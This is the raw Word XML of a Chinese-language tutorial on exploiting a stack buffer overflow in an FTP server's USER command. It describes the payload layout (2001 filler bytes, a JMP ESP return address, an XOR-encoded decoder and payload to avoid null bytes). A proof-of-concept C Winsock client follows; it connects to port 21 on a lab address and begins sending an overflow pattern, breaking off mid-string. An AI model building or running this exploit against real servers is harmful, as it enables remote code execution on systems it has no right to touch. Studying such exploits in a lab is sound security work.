          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>会有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>出现，使用指定模块查找方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D8B539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7CAD0C24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jc w:val="center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noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="05AD0CAB" wp14:editId="5ACBB97C">
            <wp:extent cx="5267325" cy="5505450"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="11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B7C960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46B52AF0" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:line="18" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pP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3.5 Shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ad"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>组合逻辑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3D0278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第一部分：”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>USER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>注意有空格</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529481CC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第二部分：无意义的字符串，长度为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>2001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>个字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26443E89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第三部分：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>JMP ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231FD5ED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>第四部分：解密代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>+Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>，位于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>ESP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>指向的地址，与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>JMP ESP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>指令相差</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>个字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175EBBDE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2859F42A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jc w:val="center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noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="5497C12F" wp14:editId="5CDAFA92">
            <wp:extent cx="5105400" cy="2962275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="10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F8B1CC" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="26" w:lineRule="atLeast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</w:p>
    <w:p w14:paraId="68C99DF9" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="26" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>在读取时被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>0x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>字符截断了，对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>进行异或加密，并在开头加上解密代码的十六进制数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BE4282" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="000608A4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PoC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="330A4207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bookmarkStart w:id="3" w:name="_Toc470277967"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#define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</w:rPr>
        <w:t>_CRT_SECURE_NO_WARNINGS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B93E75A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#define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</w:rPr>
        <w:t>_WINSOCK_DEPRECATED_NO_WARNINGS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641F353F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/*----     win32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>网络编程几步走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008000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>（客户端）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    ------*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4A8BA7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&lt;WINSOCK2.H&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DC505E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&lt;STDIO.H&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09042A07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7FCCF607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7507602D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#pragma</w:t>
      </w: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808080"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>comment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808080"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lib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A31515"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"ws2_32.lib"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701A572" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5534CD12" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65AC1064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argc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* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FDB8E7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4AB30F6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2B91AF"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>WORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> sockVersion = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>MAKEWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>(2, 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16822C4E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2B91AF"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>WSADATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEA6522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(WSAStartup(sockVersion, &amp;data) != 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D36970E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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224DB56D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1A35D910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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED4F2B6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8000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/* ---- 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>、创建套接字（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> ------ */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6FF6EC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2B91AF"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SOCKET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> sclient = WSASocketA(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AF_INET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6F008A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SOCK_STREAM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F4F4F"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>IPPROTO_TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>, 0, 0, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6460AE86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(sclient == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>INVALID_SOCKET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6C142F02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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5C41E2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printf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"invalid socket !"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37585325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527A7653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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1A3DB9" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CBEA770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2B91AF"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SOCKADDR_IN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> serAddr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692A6D98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serAddr.sin_family = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AF_INET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BBB4E71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serAddr.sin_port = htons(21);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBCFFF1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serAddr.sin_addr.S_un.S_addr = inet_addr(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"192.168.75.132"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1CB3B7EA" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A34D1F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8000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/* -------  2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>、向服务器发出连接请求（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> ------ */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D2722E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(connect(sclient, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SOCKADDR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">*)&amp;serAddr,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 xml:space="preserve">(serAddr)) == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SOCKET_ERROR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8733956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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B5DEC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WSAGetLastError()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CFF2418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printf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">"connect error </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>!"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03185BC7" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58859777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closesocket(sclient);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18109696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4F6DC79E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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418FCB0B" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="446D4C3F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8000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/*------- 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>、和服务器端进行通信（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>send/recv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-------- */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3012F244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recData[4096];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E4EB53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recv(sclient, recData, 4096, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2624BA14" w14:textId="77777777" w:rsidR="0033502E" w:rsidRDefault="0033502E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A034C75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>* sendData = (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>*)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B991161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 xml:space="preserve">"USER  anonymous </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>a0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
        </w:rPr>
